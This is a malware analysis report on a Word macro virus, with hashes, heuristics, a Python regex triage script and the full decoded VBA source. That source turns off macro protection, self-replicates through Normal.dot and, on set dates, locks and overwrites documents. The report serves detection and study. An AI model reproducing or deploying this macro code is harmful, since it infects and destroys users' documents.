Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6642bdf79504904…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 2003-02-26 21:53:00
Authoring application: Microsoft Word 10.0
First seen: 2012-06-14
MD5: a986d124854210ca52dda5efdcede4d1
SHA-1: 72eef68aa31faf043f2593c2488a9f3f2e51c9f7
SHA-256: c6642bdf79504904bb0831868ae207ef9067d8c49be4fd5fc6af087767c451b1
Risk Score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample carries VBA macros with the Word auto-execution entry points AutoNew, AutoOpen and AutoClose, which run when a document is created, opened or closed. Each entry point first switches off Word's macro virus protection (Options.VirusProtection = False) and suppresses the prompt to save Normal.dot (Options.SaveNormalPrompt = False). The 'Stp' subroutine then calls Application.OrganizerCopy to copy the "Sr" code module (Object:=3, project items) between the active document and the Normal template in both directions and saves the template, so the code infects Normal.dot and from there every document that is subsequently opened or closed. This is classic macro-virus self-replication, not a downloader. AutoClose additionally carries a date-triggered payload: if the current date, rendered as a dd.mm.yy string, equals one of 25.06.01 through 30.06.01, it sets the document password to "agl", saves a copy under <Word install path>\dc\<document name> unless the text "Hi." is already present, removes the top entry from the Recent Files list, and replaces the document body with a Russian note that reads, in translation: "This virus is my first virus; for now I am only learning. The answer to the question of how to recover your data you can, for the time being, still get by writing to me. My address is treon9875@rambler.ru. See you! Whoever needs a custom-made virus, write to me, always happy to help." Outside that window the document is simply re-saved (with ActiveDocument.Saved forced to False so the infected copy is written back). Because the comparison is string equality against DateTime.Date, the trigger only fires on hosts whose short-date format produces dd.mm.yy, and the window (June 2001) predates the file's 2003 creation timestamp, so this copy is most likely a host document infected later. A commented-out stub at the end references a blocked "view VB code" dialog with a password check (its messages translate to "This feature is blocked", "Password incorrect" and "password entered"). The ClamAV detections (Doc.Trojan.Sr-1 on the container and Win.Trojan.Alicia-3 on the extracted macro source) agree with this assessment. No secondary payload is downloaded or executed, and the code is not obfuscated.

Heuristics (5)

  • ClamAV: Doc.Trojan.Sr-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Sr-1
  • VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen entry point present; the macro runs when the document is opened
  • AutoClose macro (high, OLE_VBA_AUTOCLOSE)
    AutoClose entry point present (the rule label reports it as Auto_Close, the Excel-style name; the Word macro here is AutoClose); the macro runs when the document is closed
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this rule records an old Word macro execution surface for the analyst; it does not attribute a downloader or a parser CVE. Its generic description assumes that no modern VBA project was recovered and no stronger macro-virus family marker was present, which does not hold for this sample: the VBA project was extracted (macros.bas below) and the AutoOpen and AutoClose findings above come from it.
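The traits the heuristics above report can be checked mechanically on the decoded macro source. The following Python is an added example, not part of this report or of oletools: it runs regex triage over plain VBA text (for instance olevba output) for auto-exec entry points, the VirusProtection downgrade, writes to the Normal template, document password setting and dd.mm.yy date literals, decodes the date literals into a trigger window, and pulls out the huntable strings (contact address, password, drop directory). The finding identifiers and the trimmed SAMPLE_VBA excerpt are this example's own constructions, and mapping two-digit years onto 2000-2099 is an assumption.

```python
"""Triage decoded VBA source for the macro-virus traits this report flags.

Added example: it works on plain decoded VBA text and does not parse OLE
containers itself (use olevba or similar to get the text first).
"""
import re
from datetime import date

# Constructed excerpt of the macro source shown in this report, trimmed to the
# statements the rules below look at. It is not the full extracted artifact.
SAMPLE_VBA = r'''
Sub Stp()
    On Error Resume Next
    zz = Word.ActiveDocument.FullName
    ee = Normal.ThisDocument.FullName
  Application.OrganizerCopy Source:=ee, _
    Destination:=zz, Name:="Sr", _
    Object:=3
    Word.NormalTemplate.Save
End Sub

Sub AutoOpen()
    Word.Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Stp
End Sub

Sub AutoClose()
    Word.Options.VirusProtection = False
    Stp
    qq = DateTime.Date
    Drr = Word.Application.Path + "\" + "dc"
    If (Dir(Drr, vbDirectory) = "") Then MkDir (Drr)
    If qq = "25.06.01" Or qq = "26.06.01" Or qq = "30.06.01" Then
    Application.ActiveDocument.Password = "agl"
    Selection.TypeText (" Мой адрес treon9875@rambler.ru . До встречи!")
    End If
    Application.ActiveDocument.Password = ""
End Sub
'''

# (finding id, severity, regex). The ids are this example's own, not the report's rule names.
RULES = [
    ("VBA_AUTOEXEC", "high",
     r"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:Auto(?:Open|Close|New|Exec|Exit)|Document_(?:Open|Close))\s*\("),
    ("VBA_VIRUSPROTECTION_OFF", "high", r"Options\.VirusProtection\s*=\s*False"),
    ("VBA_NORMAL_TEMPLATE_WRITE", "high", r"\bOrganizerCopy\b|NormalTemplate\.Save"),
    ("VBA_DOC_PASSWORD_SET", "medium", r'\.Password\s*=\s*"[^"]+"'),
    ("VBA_DATE_TRIGGER", "medium", r'=\s*"\d{2}\.\d{2}\.\d{2}"'),
]

DATE_LITERAL_RE = re.compile(r'"(\d{2})\.(\d{2})\.(\d{2})"')


def scan_vba(source: str) -> dict:
    """Return {finding_id: {"severity": str, "hits": [matched text, ...]}} for rules that fire."""
    findings = {}
    for fid, sev, pattern in RULES:
        hits = [m.group(0).strip()
                for m in re.finditer(pattern, source, re.IGNORECASE | re.MULTILINE)]
        if hits:
            findings[fid] = {"severity": sev, "hits": sorted(set(hits))}
    return findings


def replicates_via_normal_template(findings: dict) -> bool:
    """An auto-exec entry point plus a write to Normal.dot(m) is the classic macro-virus shape."""
    return "VBA_AUTOEXEC" in findings and "VBA_NORMAL_TEMPLATE_WRITE" in findings


def trigger_dates(source: str) -> list:
    """Decode dd.mm.yy string literals (the form compared against DateTime.Date) into dates.

    Assumption: two-digit years map to 2000-2099, so "01" is 2001. Literals that are
    not real calendar dates are skipped.
    """
    out = set()
    for dd, mm, yy in DATE_LITERAL_RE.findall(source):
        try:
            out.add(date(2000 + int(yy), int(mm), int(dd)))
        except ValueError:
            continue
    return sorted(out)


def extract_iocs(source: str) -> dict:
    """Pull the endpoint-huntable strings: contact e-mail, document password, drop directory."""
    emails = set(re.findall(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+", source))
    # Only non-empty passwords count; 'Password = ""' is the reset that follows the lock.
    passwords = set(re.findall(r'\.Password\s*=\s*"([^"]+)"', source))
    # Directory appended to Word's install path, e.g. Application.Path + "\" + "dc".
    drop_dirs = set(re.findall(r'Application\.Path\s*\+\s*"\\"\s*\+\s*"([^"]+)"', source))
    return {"emails": sorted(emails), "passwords": sorted(passwords),
            "drop_dirs": sorted(drop_dirs)}


if __name__ == "__main__":
    found = scan_vba(SAMPLE_VBA)
    for fid, info in found.items():
        print(f"{info['severity']:6} {fid}: {info['hits']}")
    print("self-replicating via Normal template:", replicates_via_normal_template(found))
    print("trigger window:", [d.isoformat() for d in trigger_dates(SAMPLE_VBA)])
    print("iocs:", extract_iocs(SAMPLE_VBA))
```

The decoded trigger window is a statement of the author's intent, not proof the payload ever ran: the macro compares DateTime.Date to a string, so it only matches on a host whose short-date format renders as dd.mm.yy. The combination that should drive an alert regardless of the date is the auto-exec entry point together with the Normal-template write, which is what replicates_via_normal_template checks.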

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3149 bytes
SHA-256: f4802810927660d48a2f931e4708bac2674cf710411a166ffb8a7e59d037a0f7
Detection: ClamAV: Win.Trojan.Alicia-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' ModuleName = "Sr"

Sub Stp()
    On Error Resume Next
    zz = Word.ActiveDocument.FullName
    ee = Normal.ThisDocument.FullName

  Application.OrganizerCopy Source:=ee, _
    Destination:=zz, Name:="Sr", _
    Object:=3
      
  Application.OrganizerCopy Source:=zz, _
    Destination:=ee, Name:="Sr", _
    Object:=3
      
    Word.NormalTemplate.Save
End Sub

Sub AutoNew()
    Word.Options.VirusProtection = False
    ActiveDocument.Saved = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Application.Caption = "T" + ""
End Sub

Sub AutoOpen()
    Word.Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    ActiveDocument.Saved = False
    Application.Caption = "T" + ""
    Stp
End Sub

Sub AutoClose()
    Word.Options.VirusProtection = False
    Application.Caption = "TMicrosoft Word"
    Stp
    df = Word.ActiveDocument.FullName
    qq = DateTime.Date
    Drr = Word.Application.Path + "\" + "dc"
    If (Dir(Drr, vbDirectory) = "") Then MkDir (Drr)
    Pat = Word.Application.Path + "\" + "dc" + "\" + ActiveDocument.Name
    If qq = "25.06.01" Or qq = "26.06.01" Or qq = "27.06.01" Or qq = "28.06.01" Or qq = "29.06.01" Or qq = "30.06.01" Then
    Application.ActiveDocument.Password = "agl"
    ActiveDocument.Saved = False
    If ActiveDocument.Content.Find.Execute(FindText:="Hi.") = False Then
    ActiveDocument.SaveAs (Pat)
    Word.RecentFiles.Item(1).Delete
    End If
    ActiveDocument.Select
    Selection.Delete
    Selection.TypeText ("Hi.")
    Selection.TypeParagraph
    Selection.TypeText ("Данный вирус, это мой первий вирус, пока я тольку учусь, ответ на вопрос: как востановить свои данные вы, пока еще, сможете получить написав мне.")
    Selection.TypeParagraph
    Selection.TypeText (" Мой адрес treon9875@rambler.ru . До встречи! Кому нужен специализированный вирус пишите, всегда рад помочь")
    Selection.TypeParagraph
    Word.ActiveWindow.WindowState = wdWindowStateNormal
    Word.ActiveWindow.Width = 10
    End If
    Application.ActiveDocument.Password = ""
    ActiveDocument.Saved = False
    If Word.ActiveDocument.Path = "" Then
    ActiveDocument.Saved = True
    ActiveDocument.Saved = False
    Else: ActiveDocument.SaveAs (df)
    End If
    Application.Caption = ""
End Sub

'Sub viewvbcode()
'MsgBox ("Эта возможность заблокирована")
'uf.Show
'If a <> "семья" Then MsgBox ("Пароль не верен") Else Word.WordBasic.AppActivate ("пароль введен")

'End Sub